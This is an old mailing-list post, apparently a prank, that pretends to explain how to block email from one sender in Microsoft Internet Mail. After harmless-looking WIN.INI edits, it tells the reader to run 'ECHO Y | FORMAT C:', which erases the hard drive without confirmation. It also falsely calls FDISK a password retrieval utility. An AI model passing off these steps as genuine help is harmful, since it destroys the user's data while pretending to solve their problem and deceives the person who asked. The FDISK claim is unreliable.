>>do you know of a way I can block anything from Sonja68726 using Microsoft Internet
Mail?<<
I am ashamed of you guys on the list!!!!
Joseph Orchard asked a very legitimate question, and nobody helped him
out!!!
OK, so the guy earlier tried to censor us from talking about whatever we
like but c'mon can't anybody show a little understanding!?! Is the
simple fact that he single-handedly decided he should determine what we
can and can't talk about reason enough not to be our usual helful
group? Shame on us!!!
Ok, Joe here's how you make sure YOU WILL NOT BE GETTING ANY E-MAIL FROM
SONJA for a very long time. Make sure you read and understand all the
steps before doing any of them.
1) Close Microsoft Internet Mail
2) If running Windows '95 click START then from the start menu choose
RUN then type SYSEDIT and press enter
That will run the System editor. One of the windows you will see inside
the Sysedit is called WIN.INI
3) in WIN.INI look for a section (text in brackets) that reads [windows]
4) in the [windows] section type the following entry exactly, including
the initial semicolon
;EMAILREMOVEMAILFROM = Sonja68726@aol.com 'establishes user name
;EMAILREMOVEUSINGSOFTWARE = format 'software used to remove
mail
;EMAILUSERSHOULD = lookatcalendar.exe /now 'useful thing to do this
time of the year
;EMAILUSERSHOULD = avoidstep.exe 7 @allcosts 'read carefully
5) Restart windows and make sure everything is working ok (don't run the
e-mail client yet)
6) Restart the computer and go to the DOS prompt, now we need to format
your e-mail so that it will not accept mail from Sonja.
7) At the dos prompt type the following:
ECHO Y | FORMAT C:
think twice before pressing ENTER...
8) Restart your computer, you will not be receiving any e-mail from
Sonja for quite a while.
Of course one could use the Password retrieval utility FDISK but this is
easier.
